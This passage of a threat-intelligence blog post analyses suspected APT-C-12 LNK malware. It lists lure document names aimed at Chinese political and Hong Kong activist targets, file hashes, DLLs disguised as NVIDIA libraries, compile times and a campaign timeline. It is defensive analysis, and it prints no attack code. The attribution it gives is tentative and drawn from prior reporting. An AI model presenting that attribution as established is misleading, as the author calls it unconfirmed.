5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">ca1aea9710219b68fe30b964a526dc82efa08d9032959efd252f7197af1deb21<br>1a7c9ac35f4c89fe4906ee1c512c2fc5306d8d97d7ab44cc7726475923a311f1<br>fac0bfb2aedea0fde6e4f239cbfd4de9d8db55e6041cf3f62956b2dc50620506</td></tr><tr><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">String 2</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">周文重：2018博鳌亚洲论坛感谢函.lnk</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">周文重：2018博鳌亚洲论坛感谢函.doc</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">Zhou Wenzhong: Thank you letter for Boao Forum for Asia 2018.doc</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">32b3c6920eb5fcd8bddf55154e6e17453a4f07919216e7df6d84fb3f57a64966</td></tr><tr><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">String 3</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">【2018前海合作论坛】.lnk</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">附件1-2018前海合作论坛方案.pdf<br>附件2-参会回执.docx<br>附件3-深圳市前海香港商会简介.pdf2018前海合作论坛邀请函.pdf</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">Annex 1-2018 Qianhai Cooperation Forum Program.pdf<br>Annex 2-Participation Receipt.docx<br>Attachment-3-Brief introduction of Shenzhen Qianhai Hong Kong Chamber of Commerce.pdf<br>2018 Qianhai Cooperation Forum Invitation Letter.pdf</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">94aa26bac896f65cfebbb76efa9b7009c658e01e2d52d2da338483c3fb5f3188<br>52384bf0f4e694eb030a31f82b74e4fdcb261e11ede4fefa3cc5f2782bdd370b<br>f600c66bc52c84698fb52a1f12d2f50fbe3b64754b226e8adb65f0b44a831dc8<br>091880728698db599e2b577d629d3bc6c9a9b40370f3ce0b9943cee8cbf20302</td></tr><tr><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">String 1</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">《政法网络舆情》会员申请.lnk</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">《政法网络舆情》会员征集函.doc<br>婺城分局祝您鸡年行大运-1.jpg<br>婺城分局祝您鸡年行大运-2.jpg<br>婺城分局祝您鸡年行大运-3.jpg<br>婺城分局祝您鸡年行大运-4.jpg<br>婺城分局祝您鸡年行大运-5.jpg<br>婺城分局祝您鸡年行大运-6.jpg</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">"Politics and Law Network Public Opinion" Membership Letter.doc<br>Tancheng Branch wishes you a good luck in the Year of the Rooster-1.jpg<br>Tancheng Branch wishes you a good luck in the Year of the Rooster-2.jpg<br>Tancheng Branch wishes you a good luck in the Year of the Rooster-3.jpg<br>Tancheng Branch wishes you a good luck in the Year of the Rooster-4.jpg<br>Tancheng Branch wishes you a good luck in the Year of the Rooster-5.jpg<br>Tancheng Branch wishes you a good luck in the Year of the Rooster-6.jpg</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">ab0b6e3a24a4b9f102a58b8536f68ddd560e8b42c16652b9db388ef981bbf165<br>f6ca0e0bb33163143867bb496f53a6f329a927c06af0c0ddc9506d3c3fd3d335<br>6fb39753349dd8811270be863b61d0d42120c3452b8b09964e3e6c1d3ab21b7b<br>7dc76e3c60fac07d61d6dd183624458cf982b25121bcd6a26090365b0bb089d5<br>8297b9d4f7f0ffb7a8fa99d5cfe93818cb23ddbd99722dbba59e58fab27a86b9<br>687535ba02c808d795f4893962f0d9b650cea8df40d1de80ea095befe0064b91<br>b787ff47b1db14409c5524e4bc5f763e3eb5cec3cf34aa553f2b41501e955737</td></tr><tr><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">String 4</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">《观察者网》采访提纲暨相关新闻附件.lnk</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">《观察者网》采访提纲.docx<br>蔡英文接受法新社专访问答全文.docx<br>美“友台派”议员又作妖，提“2018年台湾国际参与法案”.docx<br>美参议员望通过新法案 倡议加强美与亚洲多方面长期合作.docx<br>美议员鼓动特朗普抛弃“一中”政策与台湾“复交”,专家可能性微乎其微.docx</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">"Observer.com" Interview Outline.docx<br>Tsai Ing-wen accepted the full text of the AFP interview.docx<br>US "Taiwanese" MPs have made a demon again, mentioning "Taiwan International Participation Act of 2018" .docx<br>U.S. Senators hope to pass new bill initiative to strengthen long-term cooperation between the United States and Asia.docx<br>U.S. lawmakers urge Trump to abandon "one China" policy and "return diplomatic relations" with Taiwan, experts are extremely unlikely.docx</td><td style="font-family:Arial, sans-serif;font-size:10px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:top">0ad09b21b36ddbaa24653953181cc092400eb992aac329bde58952b96dc0aa9d<br>140e069093b42d9044c8ccc53cef1b3b0226248b9d7302eb64dcdf92256fa204<br>e53bfb8826d20be3fc043a08c733221bddc2e1ba394bef9d40144c862ccf377f<br>283f88c50234a4b3961384c85124c52878ab6af4801cbc0c86a3e1d779c1c48f<br>afe2f381bf7bcb9309db216a3f956dbf05c70da9bce9dcdcabde7ef0c46c01c9</td></tr></table>
<p>At this stage, I haven&rsquo;t done any analysis on these 20 files, except basic metadata checks. Of possible interest is the file <code>陈婧+13957937111+简历.doc</code> has the email address <code>chenjingo662@sina.com</code> embedded as a hyperlink.</p>
<h4 id="dlls">DLLs</h4>
<p>The five DLLs have similar characteristics. All are masquerading as a NVIDIA dll file with similar matadata as below:</p>
<div style="width: 75%; height: 75%; display: block; margin: 0 auto;" ><img src="/2020/01/pestudio_example.PNG" alt="pestudio_example" style="border: #000000 1px outset"></div>
<p>A check of relevant hashes indicates three samples are the same, and the other two are different; however, have a recorded compilation time within 12 seconds of each other.</p>
<table style="border-collapse:collapse;border-spacing:0" class="tg"><tr><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">Identifying String</th><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">DLL filename</th><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">SHA 256 Hash</th><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:middle">ImpHash</th><th style="font-family:Arial, sans-serif;font-size:12px;font-weight:bold;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">Compilation Time</th></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">String 4</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">SwYLR.T</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">a76cb406145b1e094a8ec46ae0cf9594<br>95bfa4aa19ccf6b48353cc459c00005b</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:middle">9442FCDB7DAAB60B53A67D5A419F71F3</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#34ff34;text-align:left;vertical-align:middle">compiler-stamp: Thu May 31 23:06:58 2018<br>debugger-stamp: Thu May 31 23:06:58 2018<br></td></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">String 1</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">lyNMk.v</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">f9ee8f1ca51475397e2c190290c0aeb7<br>4a9f8a36bc0b6dfb500af7ca47d45daa</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;background-color:#fe996b;text-align:left;vertical-align:middle">6F5C40C66163B6F9E9E406E6AB83E3CC</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">compiler-stamp: Wed Feb 07 22:04:01 2018<br>debugger-stamp: Wed Feb 07 22:04:01 2018<br></td></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">String 3</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">FLrzH.w</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;text-align:left;vertical-align:middle">92ad7532f7b6cb5b6812da586ae9c2c6<br>ddf65de38aebf4067853968be20e72a2</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;text-align:left;vertical-align:middle">8E02074B51513C018F9B73FEB0BEC905</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#34ff34;text-align:left;vertical-align:middle">compiler-stamp: Thu May 31 23:07:10 2018<br>debugger-stamp: Thu May 31 23:07:10 2018<br></td></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">String 2</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">hxCEm.G</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">f9ee8f1ca51475397e2c190290c0aeb7<br>4a9f8a36bc0b6dfb500af7ca47d45daa</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;background-color:#fe996b;text-align:left;vertical-align:middle">6F5C40C66163B6F9E9E406E6AB83E3CC</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">compiler-stamp: Wed Feb 07 22:04:01 2018<br>debugger-stamp: Wed Feb 07 22:04:01 2018<br></td></tr><tr><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">String 1</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">beoql.g</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">f9ee8f1ca51475397e2c190290c0aeb7<br>4a9f8a36bc0b6dfb500af7ca47d45daa</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:black;background-color:#fe996b;text-align:left;vertical-align:middle">6F5C40C66163B6F9E9E406E6AB83E3CC</td><td style="font-family:Arial, sans-serif;font-size:12px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:inherit;background-color:#fe996b;text-align:left;vertical-align:middle">compiler-stamp: Wed Feb 07 22:04:01 2018<br>debugger-stamp: Wed Feb 07 22:04:01 2018<br>
</td></tr></table>
<p>The files <code>lyNMk.v</code>, <code>hxCEm.G</code> and <code>beoql.g</code> with SHA256 f9ee8f1ca51475397e2c190290c0aeb74a9f8a36bc0b6dfb500af7ca47d45daa were recorded on Virus Total (35/67) with a first submission date of 2018-04-26 10:14:33 and had the recorded alternative names as <code>nvapisetlib</code>,
<code>96d9fd90e180aaf435c21334858654f6.vir</code> (Norton AV) and <code>beoql.g</code>. The other two files were not recorded by that hash on Virus Total.</p>
<p>A rough timeline (if all the dates and times are believed):</p>
<ul>
<li>2018-02-07: Compilation Date of DLL sample f9ee8f1ca51475397e2c190290c0aeb74a9f8a36bc0b6dfb500af7ca47d45daa</li>
<li>2018-04-26: First Submission to VT of DLL sample f9ee8f1ca51475397e2c190290c0aeb74a9f8a36bc0b6dfb500af7ca47d45daa</li>
<li>2018-05-31: Compilation Date of DLL samples 92ad7532f7b6cb5b6812da586ae9c2c6ddf65de38aebf4067853968be20e72a2 and a76cb406145b1e094a8ec46ae0cf959495bfa4aa19ccf6b48353cc459c00005b</li>
<li>2018-07-12: 360 TIC report</li>
<li>2018-10-28: Last Submission of DLL sample f9ee8f1ca51475397e2c190290c0aeb74a9f8a36bc0b6dfb500af7ca47d45daa to VT</li>
<li>2019-10-29: Submission to Hybrid-Analysis of five LNK samples</li>
<li>2019-10-29: Submission to Virus Total of only one LNK sample: 70b6961af57bce72b89103197c8897a4ae3ce5fdb835ccd050f24acbac52900d</li>
</ul>
<h3 id="the-apt-link-to-the-lnks">The APT Link to the LNKs</h3>
<p>Googling key elements of the above malware samples, led me to the <a href="https://mp.weixin.qq.com/s/S-hiGFNC6WXGrkjytAVbpA">abovementioned report</a> by 360 TIC who detailed the exact campaign for only one of the files (ostensibly sample SHA256 ea6e7c9b9110c7c21062908be51dd3f881490b40b9b77a534fdc7812ab5cd2af). Their report is extensive, and looks at the DLL dropped and its later actions and persistence.</p>
<p>However, it is clear the samples were part of a campaign, and two of the files I can <em>very tentatively</em> associate to an online account. One identified social media account has limited use, and is linked to other accounts associated with the Hong Kong democracy movement. The second account has not been active since 2012 but posted information relating to Chinese corruption and apparent unauthorised detentions by the Chinese state.</p>
<p>However, there needs to be further information before any conclusion can be made as to the purpose of these strings.</p>
<p>If my hypothesis is correct then each malware sample was customised to include the suffix of a known identifier for the target. This likely means that the attacker did not know much about the target (i.e. end infrastructure they would potentially compromise).</p>
<h3 id="intelligence-gaps">Intelligence Gaps</h3>
<p>There are significant intelligence gaps that require either deeper analysis on the samples or further external information:</p>
<ul>
<li>Why were the samples uploaded now, and en-mass?</li>
<li>Are the suspicious string suffixes related to targets? Or are they used as reference to accounts controlled by the attacker? Or unrelated at all.</li>
<li>At least one sample is likely dated from the original 360 TIC report meaning that it was around mid-2018. What is the relationship of this sample to the others?</li>
</ul>
<h3 id="conclusion">Conclusion</h3>
<p>There is a bunch of further analysis to be done: including on the DLLs and the other extracted files from the malicious CAB files. This post is initially seeking to put the files out there, and share the comparisons between them.</p>
<p>I&rsquo;ll reiterate at this time that the &lsquo;attribution&rsquo; to the Sapphire Mushroom group is not mine, and solely based on previous reporting and the high likelihood these samples are from the same campaign.</p>
<p>If you have more information, questions, or analysis feel free to hit me up on Twitter or via email at <a href="mailto:matt@bitofhex.com">matt@bitofhex.com</a>. Thanks for reading!</p>
<section class="footnotes" role="doc-endnotes">
<hr>
<ol>
<li id="fn:1" role="doc-endnote">
<p>All Chinese-language text has been lovingly translated by Google Translate. I apologise for any errors. <a href="#fnref:1" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
<li id="fn:2" role="doc-endnote">
<p>I have chosen to redact the strings themselves and instead refer to them as STRING 1 - 4. <a href="#fnref:2" class="footnote-backref" role="doc-backlink">&#x21a9;&#xfe0e;</a></p>
</li>
</ol>
</section>

    </div>
    <div class="article-footer">
<blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    <li class="post-copyright-link hidden-xs">
      <strong>Permalink: </strong>
      <a href="https://bitofhex.com/2020/02/sapphire-mushroom-lnk-files/" title="Suspected Sapphire Mushroom (APT-C-12) malicious LNK files" target="_blank" rel="external">https://bitofhex.com/2020/02/sapphire-mushroom-lnk-files/</a>
    </li>
    <li class="post-copyright-license">
      <strong>License：</strong><a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external">CC BY 4.0 CN</a>
    </li>
  </ul>
</blockquote>

<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://twitter.com/mattnotmax" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="https://bitofhex.com/logo.png" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://twitter.com/mattnotmax" target="_blank"><span class="text-dark">bit_of_hex</span><small class="ml-1x">digital forensics | incident response</small></a></h3>
        <div>476c616420796f7520617265207468617420696e74657265737465642e204861766520612067726561742064617921</div>
      </div>
    </figure>
  </div>
</div>
    </div>
  </article>

</div><nav class="bar bar-footer clearfix" data-stick-bottom>
    <div class="bar-inner">
        <ul class="pager pull-left">
            <li class="prev">
                <a href="https://bitofhex.com/2019/11/say-cheese-an-analysis-of-foto-lnk/" title="&#34;Say Cheese!&#34; An analysis of foto.lnk"><i
                        class="icon icon-angle-left"
                        aria-hidden="true"></i><span>&nbsp;&nbsp;Older</span></a>
            </li>
            
            <li class="toggle-toc">
                <a class="toggle-btn collapsed" data-toggle="collapse" href="#collapseToc" aria-expanded="false"
                    title="Catalogue" role="button">
                    <span>[&nbsp;</span><span>Catalogue</span>
                    <i class="text-collapsed icon icon-anchor"></i>
                    <i class="text-in icon icon-close"></i>
                    <span>]</span>
                </a>
            </li>
        </ul>
        <div class="bar-right">
            <div class="share-component" data-sites="facebook,twitter,linkedin,google"
                data-mobile-sites="facebook,twitter,linkedin,google"></div>
        </div>
    </div>
</nav>

</main><footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
<ul class="social-links">
    <li><a href="https://github.com/mattnotmax" target="_blank" title="github" data-toggle=tooltip data-placement=top >
            <i class="icon icon-github"></i></a></li>
    <li><a href="https://bitofhex.com/index.xml" target="_blank" title="rss" data-toggle=tooltip data-placement=top >
            <i class="icon icon-rss"></i></a></li>
    <li><a href="https://twitter.com/mattnotmax" target="_blank" title="twitter" data-toggle=tooltip data-placement=top >
            <i class="icon icon-twitter"></i></a></li>
</ul>
  <div class="copyright">
    &copy;2018  -
    2020
    <div class="publishby">
        Theme by <a href="https://github.com/xiaoheiAh" target="_blank"> xiaoheiAh </a>base on<a href="https://github.com/xiaoheiAh/hugo-theme-pure" target="_blank"> pure</a>.
    </div>
  </div>
</footer>

<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/MathJax.js?config=TeX-MML-AM_SVG"></script>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
            showMathMenu: false, //disables context menu
            tex2jax: {
            inlineMath: [ ['$','$'], ['\\(','\\)'] ]
           }
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
<script>
    window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/highlight.min.js"></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/python.min.js" defer></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/javascript.min.js" defer></script>
<script type="text/javascript" src="https://cdn.staticfile.org/highlight.js/9.15.10/languages/powershell.min.js" defer></script><script>
    hljs.configure({
        tabReplace: '    ', 
        classPrefix: ''     
        
    })
    hljs.initHighlightingOnLoad();
</script>
<script src="https://bitofhex.com/js/application.min.bdeb64b910570b6c41badc6a05b7afb0c8ad9efd8525de3c7257d59e786326a3.js"></script>
<script src="https://bitofhex.com/js/plugin.min.51ff8c7317566f82259170fa36e09c4493adc9b9378b427a01ad3f017ebac7dd.js"></script>

<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Pages',
                CATEGORIES: 'Categories',
                TAGS: 'Tags',
                UNTITLED: '(Untitled)',
            },
            ROOT_URL: 'https:\/\/bitofhex.com\/',
            CONTENT_URL: 'https:\/\/bitofhex.com\/\/searchindex.json ',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script type="text/javascript" src="https://bitofhex.com/js/insight.min.a343cd9a5a7698336b28ef3a7c16a3a1b1d2d5fb17dc8ed04022bbe08cc5459073a15bdafa3a8a58cdd56080784bdd69fa70b1ae8597565c799c57ed00f0e120.js" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
<script>
    tocbot.init({
        
        tocSelector: '.js-toc',
        
        contentSelector: '.js-toc-content',
        
        headingSelector: 'h1, h2, h3',
        
        hasInnerContainers: true,
    });
</script>


  </body>
</html>
